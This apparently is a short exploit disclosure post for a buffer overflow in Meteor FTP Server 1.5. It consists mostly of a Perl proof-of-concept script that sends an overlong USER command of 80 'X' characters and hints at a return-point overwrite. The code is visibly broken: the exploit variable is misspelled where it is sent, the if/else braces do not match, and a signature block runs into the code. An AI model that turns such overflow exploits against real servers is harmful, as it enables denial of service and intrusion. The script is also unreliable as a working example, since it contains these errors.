[INTRO] Affected version: 1.5 Hello to all! Bug was found by Auston J (Anix44@xxxxxxxxx) today. So its perl code for demostration [----]
[CODE] #!/usr/bin/perl
# 47meteor_bof.pl - PoC exploit for Meteor FTP Server
# version 1.5 # bug found by Anix44@xxxxxxxxx # # coded by k0r0l from acolytez team
# visit http://acolytez.com for details #
use Net::FTP;
# geting data $host = @ARGV[0]; $port = @ARGV[1]; $debug = @ARGV[2]; # ===========
$ftp_error = "Unable";
if (($host) && ($port)) {
# make exploit string
$exploit_string = "USER ";
$exploit_string .= "X"x80;
#$exploit_string .= "\n\n\n\n"; - it will be new return point !
# ===================
print "Trying to connect to $host:$port\n"; $sock = Net::FTP->new("$host",Port => $port, TimeOut => 30, Debug => $debug) or die "[-] Connection failed\n";
print "[+] Connect OK!\n";
print "Sending string...\n";
$sock->login($exploit_sting, "testpassword");
$answer = $sock->message;
if ($answer =~ m/$ftp_error/i) {
print "\n[-] Sorry! Failed\n";
} else {
print "\n[+] Send ok!\nServer can be explorated!\n\n";
} else {
print "\nMeteor FTP Server - PoC Exploit\nhttp://AcolyteZ.com\n\nUsing: $0 host port [debug: 1 or 0]\n\n";
-- +################################+ # Dim K0r0l (dim@xxxxxxxxxxxx) # # # # http://AcolyteZ.com # # Net-security, coding, soft etc # +################################+